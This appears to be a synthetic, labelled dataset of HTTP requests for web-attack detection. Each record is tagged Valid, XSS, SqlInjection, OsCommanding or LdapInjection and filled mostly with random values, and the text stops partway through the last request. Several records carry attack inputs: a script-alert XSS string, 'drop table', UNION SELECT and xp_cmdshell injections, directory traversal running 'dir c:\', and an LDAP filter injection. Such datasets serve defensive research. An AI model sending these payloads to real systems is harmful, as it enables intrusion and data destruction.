GET /Dsubeto1nlsratnr/leliuh9iatnzFxefpcno/1yftNnesn4eIaS/9YuechoYaKadminB_mYdelete/hdltahi/aZ/bIQbvaFeuo/mb3z94i2Rq9A9.asp? HTTP/1.1
Host: 247.222.214.79
Connection: close
Accept: image/png, text/xml, image/gif;q=0.6
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: eoOE-ii;q=0.8, hr-aaht;q=0.7, slAxae9-fiine, thH1ra-tzI;q=0.6
Cache-Control: only-if-cached
Client-ip: 208.5.177.174
Cookie: aYrogNnDr=ekhr9cjk$Ehp9@t;toi7eiznthfh=Cemni/ta;iiRJnehgtE=229;fzie2lhLam9ip=copP;30et=booal1fwmm;pTaaU=3Esgl8eOotzgt
Cookie2: $Version="44"
Date: Tue, 24 Jan 06 13:10:01 UTC
ETag: "lgCZs8ZkMKUQe-8on"
Expect: 100-continue
From: tRacmea@eiis.cz
If-Modified-Since: Mon, 02 Jan 06 03:08:42 GMT
If-Unmodified-Since: Tue, 19 Jul 05 20:30:41 UTC
If-Match: "jsQafliL-IjrZWK9n"
If-None-Match: *
If-Range: *
Max-Forwards: 1148
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM NnJ1bGRkc3R1Z25jaG50QW5lYXA4MjY4c21SNnBybnNlNjVxMw==
Authorization: NTLM bzJub2R0Y25TMWVtZTZpcTVzc3JlZW5jbExyYW50dG5tb2FvaHRreWlTN2Vy
Range: 266128-
Referer: /rtbwao8/rulN99sB.asp
TE: chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.6 (compatible; Konqueror/1.9; Win98; E5rsiaep; cmhr; tdkta1novd)
UA-CPU: StrongARM
UA-Disp: 1100,347,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1057x068
Via: bzhz/1.9 205.126.209.81, HTTP/2.5 220.194.101.159:1
Transfer-Encoding: compress
Upgrade: avrfan/8.7, eJt/9.9, Nel/3.2, 7dssn/4.1
Warning: 615 www.rhpe.shtml "litiIofi1" 
X-Forwarded-For: 153.114.223.45
X-Serial-Number: 760698596875297
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3656
Start - Id: 47970
class: XSS
GET /iSeTdemIiettetewntz/edna/nnEkacnKihr/olSsco5hgatdk0qr/1l1rqwNhWhC0/rptasfs4eRmesyHBre/A3W4T/iD8CuYff@v12FI7W/eh/L7open/ajMmsoh.yEZE.dll?2WBay8Fnprocessing-instructionp=C%5DootBr&sCxWwxmMCl=lloae9k1wn%40atI8om2n&oaahk1zte1=%3C%21--+--+--%3E%3Cscript++%3E%5Balert++%28%27sfsatieb%27%29%3B%5D%3C%2Fscript%3E%3C%21--+--+--%3E&PIMcGI8eEh=593817574 HTTP/1.1
Host: 171.243.54.184
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-3;q=0.5, x-mac-hebrew;q=0.5, x-mac-icelandic
Accept-Encoding: 
Accept-Language: 9Snbf7a-xto, t-llgdttq;q=0.4, oonio-tru0oeh;q=0.5
Cache-Control: no-cache
Client-ip: 8.102.174.32
Cookie: mY0home= e 7'
Cookie2: $Version="1"
Date: Sat, 27 Dec 08 21:38:48 GMT
ETag: W/"YuclQnAaadN.hM_u"
Expect: 100-continue
From: etro@rlateera.gov
If-Modified-Since: Sat, 27 Mar 04 24:47:05 CET
If-Unmodified-Since: Sat, 30 Apr 05 08:13:13 CET
If-Match: *
If-None-Match: "2UIyEu4INsrbEcyf9"
If-Range: Tue, 23 Jan 07 01:58:12 GMT
Max-Forwards: 7
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: cdaead o0tyni=dtuinus
Authorization: Basic ZmU1czpubm5ub0U=
Range: -3122,1126-
Referer: http://www.eDisa.cz/hoonoeos/aehtiasW/tegsA.avi
TE: trailers,trailers,deflate;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/4.0 (Windows; U; Win 9x 2.3; ui-vl; rv:9.6.7) Gecko/41380564
UA-CPU: 68000
UA-Disp: 305,820,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 480x167
Via: HTTP/9.6 www.g2ot.js, 0.4 www.d9si.tiff, Ilutln/4.5 www.lensTo.shtml
Transfer-Encoding: gzip
Upgrade: eat/7.3, imnF/6.2, 5tcs/7.4
Warning: 319 www.lcdiYive.shtml "isuriaeymsr" "Mon, 25 Jul 05 15:24:43 GMT"
X-Forwarded-For: 31.111.134.242
X-Serial-Number: 41529
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47970
Start - Id: 26922
class: Valid
GET /dBV/anMkhqaH/69_W7/sHyUXrYBJ_0@i/t_hAqwO/zffOXvEkzlt/49LFbrx3wawNgYda08o/tsHttjaNde1Nzua.sh?raienotasp=ovud&5W8FC_=p2e92e+iha8ee&xkj3ngtnozi7nl=aDiAnodesnYss%29&rtmeeyips6=twvtod%40&uroucaruHee=lib9rinputs+%3Arendh&tabmbo6f=5hn1&wu9yar=0241626&ht4arwnen0wa=42&ippumotrt=nM2TwXi HTTP/1.0
Host: www.ur3e.org
Connection: close
Accept: */*;q=0.0
Accept-Charset: shift_jis;q=0.2, cp-932, koi8;q=0.3, windows-1257
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 166.129.125.203
Cookie: iyhfe=bdtc8th
Cookie2: $Version="3"
Date: Wed, 19 May 04 24:21:06 CET
ETag: W/"@NvXJ@pzSAgkI4b"
Expect: rielsotd
From: hivetoa@epAldB8o.biz
If-Modified-Since: Wed, 01 Oct 08 16:22:41 UTC
If-Unmodified-Since: Mon, 07 Apr 08 02:46:30 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Jan 09 07:51:13 CET
Max-Forwards: 458
MIME-Version: 3.8
Pragma: ncss=m
Proxy-Authorization: NTLM aGFkbHRyb0RxYVRiMHQwaWV0bjY0bXNkMGg2emV0aHR0bnJTTThI
Authorization: 6kebna snosvj=28l57
Range: 909287-,-7
Referer: /wgpeh/onze/cvilaxi.pl
TE: trailers,deflate;q=0.6,gzip
Trailer: If-Match
User-Agent: ah4en5uipb/3.1
UA-CPU: Sparc
UA-Disp: 5159,4432,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 838x311
Via: FTP/8.0 www.rDaoN.html
Transfer-Encoding: identity
Upgrade: nag0E/3.8
Warning: 818 www.epeni.shtml "ttaTrueeopAqad9dns" "Sun, 12 Apr 09 10:10:01 CET"
X-Forwarded-For: 31.91.23.195
X-Serial-Number: 781010344531
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26922
Start - Id: 35034
class: SqlInjection
POST /Sd9aarA7/rdV6V2mzJosMAe.i5d/d_cFIOWayizVIFxk/fXz.cgi? HTTP/1.0
Content-Length: 266
Content-Language: 3pcsnkgs
Content-Encoding: deflate
Content-Location: /endeuhs/apsrmse/bdnk/ehaTanr/lbndaa.txt
Content-MD5: bWU1aWpsc2x2dXN1a2llbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Feb 10 01:32:26 CET
Last-Modified: Fri, 13 Feb 09 02:03:15 UTC
Host: 131.75.5.171
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=7400
Client-ip: 8.177.89.52
Date: Fri, 27 Jul 07 21:54:59 CET
ETag: "IUqh7lllgLucWSd"
Expect: 100-continue
If-Modified-Since: Sun, 21 Nov 04 23:45:06 GMT
If-Unmodified-Since: Fri, 01 Jan 10 01:34:48 CET
If-Match: "mFQjyD86fLq3JNF8J"
If-None-Match: *
If-Range: "lGTO.4Y0@PpUcnFk1VI"
Max-Forwards: 28
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: nssols ebtA=admnc
Authorization: NTLM YWFuVHM1c2FnbXVodHJFdWxzdXJ1amVkZjhnaGlyZVRlVXQ0
Referer: /rnods/lysna/2tuet.mpg
TE: trailers,trailers
User-Agent: Mozilla/2.5 (Machintosh; U; PPC 4.1; qa-tr; rv:8.8.2) Gecko/26112053
UA-CPU: 68000
Via: 5.4 147.169.128.253, 5.0 www.iaetup8s.jpeg
----: --------------------

rY8r=38&rTC804=77734274&LDTS0JW-=5467271&ljeay0fA28=exec   xp_cmdshell     '"yaIlnud7s2"    >>  script.vbs'&s1Es=pohEt2ndcataezoimgdsnvgo&t0McC5hdj=2s&onksdloe7ud=T@y&ljKM@G4MM=dl?&sas0llkoh=9029&etrt=91449515&n7diOlt=cdlnsw:eronA8&Suysotdeislu=066

End - Id: 35034
Start - Id: 7282
class: Valid
POST /thantanJooUouatsb6/eHXH8d/2dtih2b3jxotl6i/4X7tlUy.css? HTTP/1.1
Content-Length: 104
Content-Language: nb,NhRhs
Content-Encoding: gzip
Content-Location: /ar746/ntiaohs/tena.tiff
Content-MD5: dG1ldmFhdHRhc29hY2JVZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Oct 09 23:23:14 UTC
Last-Modified: Fri, 07 Oct 05 09:25:28 UTC
Host: www.BsSIootYBn.it:80
Connection: eateo5H
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 180.159.10.206
Cookie: chgroUs1v=ke>inufas=;wowxTxRjE=~glneeszpaqee;ssttYs=426197
Cookie2: $Version="2"
Date: Fri, 02 May 08 17:55:20 CET
ETag: W/"a_P_.ceqKKH6kOr8J"
Expect: 100-continue
From: aleOu@hlmCevz4na.org
If-Modified-Since: Wed, 23 Jun 04 17:33:16 UTC
If-Unmodified-Since: Tue, 01 May 07 20:07:19 GMT
If-Match: *
If-None-Match: "dehlTL@E-7uMZSOV"
If-Range: "sWC1KU0R0anUu9O"
Max-Forwards: 239
MIME-Version: 8.8
Pragma: a=d2jos
Proxy-Authorization: Eirtt hmefn=eehsteiw
Authorization: Basic VG5pdGk6d2V6cG51
Range: -4
Referer: http://www.csna.com/rt6llA/CSrr/aoakiatc/eer19/0maaiau2.php
TE: gzip;q=0.5,chunked
Trailer: Connection
User-Agent: ouxuhklr
UA-CPU: 68000
UA-Disp: 6402,121,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 400x2511
Via: FTP/2.7 145.180.114.224, atle/4.5 www.eoats.gif, i1nmet/2.5 www.niuaf.html
Transfer-Encoding: identity
Upgrade: rdt/2.6, bbnoh/3.2, 1lceaS/9.8
Warning: 924 www.rtAils.htm:75 "ahvM8nsnku" 
X-Forwarded-For: 51.142.208.191
X-Serial-Number: 35067124458
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

thAVa=x6u&rvEauyi=455277&4qetdnit9=290&B8stdinxkyuuPV=i&znsh=ttcsh&viwe45NeKsht=6542134&feTna01=uiRhsnsm

End - Id: 7282
Start - Id: 42035
class: SqlInjection
GET /mp0S8-W.e-iHZ/tU4zX_u/mhE4/arae1hWee/hpbnqhTernnfo82/aOcEJQeZszy4@vufgIz/rADF/pppah7na/re92atrl/rJ-OPY1.mdb?r5Tsgoerih9=sl%29rlaswinnt%25nvieesete&gda4Rdsl5rpo=%27%3B+++++drop++table+++++o1f4gst HTTP/1.1
Host: www.nccyl.org:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-cyrillic;q=0.7, utf-7, x-mac-icelandic;q=0.8
Accept-Encoding: gzip;q=0.8
Accept-Language: sttm-qv4h;q=0.0, dayCi-eoa9rv;q=0.7, cmnd-78aep1r
Cache-Control: no-transform
Client-ip: 86.202.146.12
Cookie: 5rvhqve=51175880;ltullm=030707
Cookie2: $Version="324"
Date: Fri, 18 Sep 09 03:59:50 UTC
ETag: "_N1zf0lhG2wuFUyPI7"
Expect: htuts=nr7wu2he
From: eliqs@octere.st
If-Modified-Since: Mon, 02 Apr 07 05:26:46 UTC
If-Unmodified-Since: Thu, 26 Aug 04 07:40:34 CET
If-Match: *
If-None-Match: "TqRTcFAxyZw-vHYe"
If-Range: Mon, 15 Dec 08 04:20:27 UTC
Max-Forwards: 704
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic ZWdvZTpuaGY0aG4=
Authorization: Digest nonce
Range: -64,-31871,6-
Referer: http://www.Shrlwtm.biz/tdi6Etdt.mp3
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/5.1 (compatible; EgaJml; Linux i386; eali47x; wsbarx0; ch5egisGe2)
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 422x9399
Via: FTP/0.5 www.eaamhx.js
Transfer-Encoding: msot; zwt2iob=igOehlSm
Upgrade: 9zntm/8.2, unrd/8.7, iGIo/4.8, tsi6b/1.8
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 128.48.152.130
X-Serial-Number: 3520691491140757
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42035
Start - Id: 44445
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.1
Host: 208.4.177.153
Connection: close
Accept: image/*;q=0.6, image/jpeg;q=0.7, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 173.115.52.160
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="65"
Date: Wed, 12 Jul 06 11:10:39 CET
ETag: W/"FP76Uf4Vrb4BtBS"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Fri, 26 Jun 09 13:56:12 CET
If-Unmodified-Since: Mon, 24 Aug 09 02:46:52 GMT
If-Match: *
If-None-Match: "tD-AdFNeJITK9hNDA"
If-Range: Mon, 08 Nov 04 08:50:39 UTC
Max-Forwards: 3864
MIME-Version: 6.3
Pragma: eld='ro'
Proxy-Authorization: Basic aWVzODp5ZWh5aQ==
Authorization: Basic d3JjTHplNnI6Z241c25l
Range: 6-02287,72753-
Referer: http://www.ntban.cz/njopz.wav
TE: trailers,trailers
Trailer: From
User-Agent: 9ufeeteaswlcgLOeatii
UA-CPU: Sparc
UA-Disp: 267,4051,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 053x237
Via: FTP/2.9 www.Heqanhu5.htm, FTP/2.4 84.138.153.6:35
Transfer-Encoding: deflate
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 817 97.27.246.180:97 "fri3lee1seear1g" "Thu, 29 May 08 16:18:48 GMT"
X-Forwarded-For: 0.187.253.54
X-Serial-Number: 45781122630812126119
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44445
Start - Id: 42421
class: SqlInjection
GET /ORyW/n@jQ0qnlSRTOk/uzblsertFpIem/heRe8vneatDfs2et/dAar0leospaeeso/staioilasnpnlo/nosuej5tr/aNsWyDA9SYOnE5v/cechoP/px0r6nmtEaqic9ele/n.aaclZ/thdINyRKojnxQe8sN2Pk.aspx?i2whetaaydi=o4crsec%27j4hb-re&fnrhcr=f7Lga&mlhsitbwca=2990860&1mosfhnltnja=34548514&des6bdR=%27+%29++UNION+++++ALL+++SELECT+++68++FROM++++b5tftetatr++WHERE+++++%28%27%27+++%3D++%27&tt=nm8evntsnc1pa&ESgte=os5iba&pmn6m=667&Ohwt=ecQBfEUUVl HTTP/1.1
Host: 202.12.129.128:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i, windows-1257, windows-874, cp-932;q=0.0, ks_c_5601-1987;q=0.5
Accept-Encoding: 
Accept-Language: AO-t, ie8as-usoTu9, hbsst-no3, eecpail-go7t;q=0.5
Cache-Control: no-transform
Client-ip: 88.187.116.188
Cookie: nut4c3Ets=97140641;1nlelpcarofostr=Ld/i
Cookie2: $Version="157"
Date: Tue, 11 Oct 05 17:46:29 CET
ETag: "0aLhFbG8X1U5SJN"
Expect: 100-continue
From: Tm9x@je4xi.it
If-Modified-Since: Tue, 30 Sep 08 09:05:02 CET
If-Unmodified-Since: Tue, 30 Mar 04 08:10:04 GMT
If-Match: "cAIb_99Jt2460q1JbtI"
If-None-Match: "pNN1.vyaxQzf9kZ"
If-Range: Thu, 12 Jul 07 13:56:14 UTC
Max-Forwards: 41
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: NTLM V2hvOXR0dG5uRmF3ZEVhbzllbTF0c1VrZXZpaGk2bklaOGVYVWl3ZW9jZlBk
Range: 005696-6624,4-
Referer: /Uwxeu/atrN.wav
TE: gzip;q=0.6,trailers
Trailer: Trailer
User-Agent: ttewtmoenAsMo
UA-CPU: 68000
UA-Disp: 4009,500,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 189x646
Via: HTTP/8.6 75.65.7.131, 7.4 159.222.188.196, HTTP/9.5 162.111.39.197
Transfer-Encoding: gzip
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 781 102.8.11.215 "Yhee38R7lileIanstkb" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42421
Start - Id: 1572
class: Valid
GET /mansl1yRrpolnsiwst/dtXej/sQB765culxq@/aee49h5/iaanaebocad5xonb.mspx?rerbasmd=4075&twesv0oA=mbhmTja7siTnt HTTP/1.1
Host: 220.219.109.202
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 8.198.218.53
Cookie: ci=MnIknaic;M2wnI=&Bsen7;annpnhye2n3=091;fluhn=2sOY_QpAL;oe=euiframeTqincludeanaareplace cCaccess_log;fntdoseothyeny=uee5s
Cookie2: $Version="8"
Date: Thu, 07 Jun 07 20:51:04 CET
ETag: W/"TcNTBE.hnvT-fkK"
Expect: 100-continue
From: tyoranj@tial.uk
If-Modified-Since: Fri, 04 Jan 08 03:55:00 CET
If-Unmodified-Since: Fri, 09 Apr 10 15:16:21 GMT
If-Match: *
If-None-Match: "NTUtP2LOcL5nHanl0d"
If-Range: Fri, 02 Jul 04 24:42:43 CET
Max-Forwards: 3375
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic cmlvNm5zOnJ0cHI=
Authorization: Basic ZWVjYXNueHc6Z3llc2Jyc2U=
Range: -7155,577-
Referer: http://www.k3easv.st/md96eN/wbnAeefy/ooe1cRat/nceh/qnltg.png
TE: deflate,deflate,deflate;q=0.2
Trailer: Authorization
User-Agent: Mozilla/7.5 (Windows; U; Win 9x 2.4; qt-sf; rv:0.2.2) Gecko/05395615
UA-CPU: StrongARM
UA-Disp: 7507,6245,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7934x8697
Via: 8.4 41.131.132.227
Transfer-Encoding: identity
Upgrade: tbn/9.6, 9ao/1.1
Warning: 518 www.hers.gif "aamoe7haewyo" "Sun, 21 Dec 08 03:56:11 CET"
X-Forwarded-For: 36.197.187.144
X-Serial-Number: 4623775518466698
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1572
Start - Id: 13821
class: Valid
GET /eB3/5f/d8UhoTKRQ/wvO/nbJKiD/t.J5ZBAhl75R41xdW/vc8bsjnijfaediozl/a5PH/iu0Dwgyueht/Lr-KZandHDR1NT-P/rInxm@Ql/0Jx.3u.cgi?qdaefisetelti5=lresecfr9szboeoc&snsn0t=anisRtntnda&Et.@passwd_rscript2=8457335&aae=no&3xp_fOEHGsw=62384104&document5KJnetcathttps0=e+b&x5Qnph-Ijp_wqaA=athteI&tmherhetnMrP46n=0Onrei3Ep%25toscriptio&H4hd=3741594&itNdhRtotOCrds=05&inHloeyll=2%3F7e%7Emainsertlrfexeciscibody HTTP/1.0
Host: www.inei0rh.de
Connection: keep-alive
Accept: image/png
Accept-Charset: iso-8859-1;q=0.4, iso-8859-3, cp-932, euc-cn;q=0.1
Accept-Encoding: 
Accept-Language: oipit-wb, rh-nygz;q=0.1, ehfnyto-8gsiie;q=0.9
Cache-Control: only-if-cached
Client-ip: 120.246.1.145
Cookie: eMwtra=Ars;eici1ule7nsihz=78462138;sloeEZuTboseuo=lbAWPpkG0O;TVuniondadmini4=sn1isgan6rheJ;L7linkg.Y=ef.
Cookie2: $Version="3"
Date: Tue, 10 Feb 04 16:53:06 CET
ETag: W/"JHKjtOdyKWUyvJ2S"
Expect: 100-continue
From: ZsDrsgy@qEamyqe.uk
If-Modified-Since: Sat, 23 Apr 05 14:02:58 GMT
If-Unmodified-Since: Sat, 31 Oct 09 09:03:10 CET
If-Match: "5H.s6DgdsLX0MW.EZnL"
If-None-Match: *
If-Range: Sun, 20 Apr 08 04:18:12 UTC
Max-Forwards: 8
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ycrd"
Authorization: Basic MmU1YUI5aTp1dXA3
Range: 014-44,-77449,4-77098
Referer: /tee6o/cmn8ige/ntgthze/diai.jpeg
TE: chunked;q=0.4
Trailer: Max-Forwards
User-Agent: Rtri (qL8J90X; zqnObr; hZQOZGT)
UA-CPU: MIPS
UA-Disp: 804,7636,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 750x449
Via: 6.2 www.abjdri.png, HTTP/9.4 221.211.124.243
Transfer-Encoding: identity
Upgrade: qee4/7.2, h7qc/4.6, eyeEwt/7.6, 8hisz3/8.0
Warning: 666 84.76.236.184 "t0uoITqzpy2Sloui" 
X-Forwarded-For: 166.8.232.165
X-Serial-Number: 4673699275390197026
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13821
Start - Id: 34769
class: Valid
POST /xHwyIHCb_765mWkV/epK2_4vBDqm/wp-kY/Uwt.v9/rIz@E3WFx2/rh3d8cP/dggn8on4eoA5t/nph-Q/Ww4TpR/rgL/sislntijuifeenwa.js? HTTP/1.1
Content-Length: 218
Content-Language: okpl,eeiLd
Content-Encoding: compress
Content-Location: http://gteq4.net/TbDops/wuceih/omnd1j/Qz4snae.pl
Content-MD5: dmNub2VweXR0Ymd1Z2F0eg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 31 Jul 08 01:27:53 UTC
Last-Modified: Mon, 26 Jan 04 06:46:07 UTC
Host: 75.206.196.74
Connection: keep-alive
Accept: text/html, text/html
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: mhcarcie-betge;q=0.8, I-ltest, nouttaae-eho
Cache-Control: no-cache
Client-ip: 106.74.246.159
Cookie: ntjaeE=8C3RhAGj;9r=uemt=wj oae4aywgg+1xp_;otEhue=06
Cookie2: $Version="20"
Date: Fri, 11 Dec 09 10:52:32 GMT
ETag: "1vKuQnBhTCfQ8PE"
Expect: rnuaet
From: iaoc1brO@mxbt8wsL.be
If-Modified-Since: Thu, 31 Jul 08 21:35:29 GMT
If-Unmodified-Since: Thu, 02 Sep 04 11:21:34 CET
If-Match: "FemujSPC8eSb3wF5"
If-None-Match: "370gF@43Bc5JJa4-_"
If-Range: Sat, 04 Jun 05 01:04:12 GMT
Max-Forwards: 95
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: sssem eiteh9=s7a8xhej
Authorization: NTLM d2l0aW9zYm9xbW9sbW1tMHVmc3V0c2VlYXJzZmUzbGhvYU5zMmlkbmV6YWdh
Range: 40725-825,171943-,0918-722285
Referer: http://9uyh.net/ees1en/nIfewns.mpg
TE: deflate,gzip;q=0.0,deflate;q=0.9
Trailer: Accept
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 0.4; ah-ds; rv:5.1.3) Gecko/10413309
UA-CPU: MIPS
UA-Disp: 456,5311,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 262x4505
Via: 3.5 www.anee.gif, FTP/4.5 www.aoijhTsn.tiff
Transfer-Encoding: identity
Upgrade: slct/7.5
Warning: 563 www.oSibytw.htm "7HeelDne" 
X-Forwarded-For: 59.6.197.154
X-Serial-Number: 438515700357527
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eegtz4ao=h8nJJfWE&jfB3=69&1ctmsg5Eat8een=789529587&sock_streamH1tb6U4Q=mwo5o&oul2=3le4s61reh&neeTvoiRyns7i=23114&BVR36=gedropvutl&0egA7mxhodtm=ir_CS&woeielrlluoleo=596735208&t0Ahs87=hnoI6sunaexe4&54NheEttctee=d7Af3yeph

End - Id: 34769
Start - Id: 37295
class: LdapInjection
POST /sapeeeyxot/roonk4nrnn9ol/tmoSuaeawecani/2GZZ2J8-@Zm.tiff? HTTP/1.1
Content-Length: 182
Content-Language: sasg
Content-Encoding: deflate
Content-Location: http://www.enaa.org/hspoA.aspx
Content-MD5: c25lZWEyeXMxVG44YWtuaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Mar 09 16:14:08 GMT
Last-Modified: Mon, 11 Aug 08 12:12:47 CET
Host: www.llewucsy.ch:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2;q=0.7
Accept-Encoding: 
Accept-Language: wn-dt, dtornctg-se5ae
Cache-Control: uet='m'
Client-ip: 52.245.233.179
Cookie: nA=nzqYCjwMrgF1;ouOL2ttf=Ea)(&(objectClass =ow*)
Cookie2: $Version="5"
Date: Sat, 05 Jul 08 13:39:22 GMT
ETag: W/"NCej-@knPGPSlRtir"
From: nMena2ee@udyboZceh.st
If-Modified-Since: Fri, 10 Feb 06 13:35:15 UTC
If-Match: "oD_iiF4pZImXiDEoP"
If-None-Match: *
If-Range: Mon, 27 Jul 09 21:52:34 CET
Max-Forwards: 320
MIME-Version: 3.4
Pragma: no-cache
Authorization: NTLM b29ZU2l1ZWdlb3VhZTFqaHdtcGF3aWl0ZTdoaXMzbGlhbnRp
Range: 007-
Referer: http://www.2lte.cz/tPmlMSe/ddar/bctyel5h/lae8is/raneef.sh
TE: gzip;q=0.4,trailers
User-Agent: nnE8g/1.0.5
UA-CPU: Sparc
UA-Disp: 4581,723,16
Via: ayna/5.1 www.IcNal.tiff, HTTP/0.8 40.160.35.96:0, 0.0 189.204.75.174:7
Transfer-Encoding: gzip
Upgrade: NXtye6/9.9, lid/7.9, dnIi/2.4, gtstes/2.9
Warning: 476 112.232.122.99 "ryRsitGa9" "Fri, 07 Jul 06 24:40:27 CET"
X-Serial-Number: 5452220594999212344
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~

uCtP=60409&it=eimcen&oothvny4=8306978&re5E12sra=dABtyTC7&AXV.winnt86miXq0=8007&S4rYdorVW5Gshutdown=ld10?connect=sfkCsa4mosa&socA3x9nzosp=5&s6iuvnwo8Ae=eiIj6iens&jaffc8l=ohttpsetr

End - Id: 37295
Start - Id: 23108
class: Valid
GET /6IdaeRimm.cgi?eiiC=7jhnnrromct&pywtfmaa=mw3b&lrnd=jorn9q3msnrepi&awtpetmernpHc=e&E5ip=tpi4nla9osEei50enb&emolerjee=ncar&unle3=iite+-2&rjtsfbd=%25ead&deieieni=smttmpexec+9z+auebsefqsnhttp HTTP/1.1
Host: 208.117.204.88:80
Connection: close
Accept: */*
Accept-Charset: windows-1258;q=0.2, x-mac-ce;q=0.9, x-mac-arabic;q=0.2, x-mac-ce;q=0.7, utf-8
Accept-Encoding: identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 64.33.164.229
Cookie: i94Intie=iaobo21tad0ws6w
Cookie2: $Version="954"
Date: Sun, 01 Jan 06 19:08:26 GMT
ETag: W/"t15mmUNACPbF9yvF1h8d"
Expect: npeo
From: Hocan@osthutarg1.biz
If-Modified-Since: Tue, 24 Mar 09 19:28:45 UTC
If-Unmodified-Since: Sun, 27 Sep 09 12:15:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 409
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic b3RUZ3Jtcjplcm9M
Authorization: NTLM cmllZWkzY3RpcnNldGlzZG93dGVlZWlvcjFub2RzdHRsUm1lZA==
Range: 189-,863-
Referer: http://www.ptol.fr/bsemUel/fge7/seahey/enngie/G5aniAd.mpeg
TE: chunked;q=0.9,trailers
Trailer: Accept
User-Agent: oEp@Pc0@ http://www.ecefm.biz
UA-CPU: Sparc
UA-Disp: 519,575,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0764x660
Via: HTTP/3.2 200.100.236.172, i1t/6.7 48.142.249.33:18
Transfer-Encoding: hebjE; Shtkw2=Rwfj
Upgrade: raife3/4.4, tde/7.8, hre/2.4, wcct/1.7
Warning: 770 123.137.130.236 "6enewerc5oeejdr" "Tue, 23 Aug 05 16:07:21 CET"
X-Forwarded-For: 73.70.52.35
X-Serial-Number: 026545042
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23108
Start - Id: 27363
class: Valid
GET /cyf/mrYdMX@FM@R/dehoOo/p2nretuiHrp1no3/abrqo/j8/lnz/itnkfxtermIp1Nq/ynnyvgwtaauril1n/rwDyeBbhttpsbinNa/c8bbdn.sh? HTTP/1.0
Host: www.ozrhlH.net
Connection: lncu
Accept: */*;q=0.8
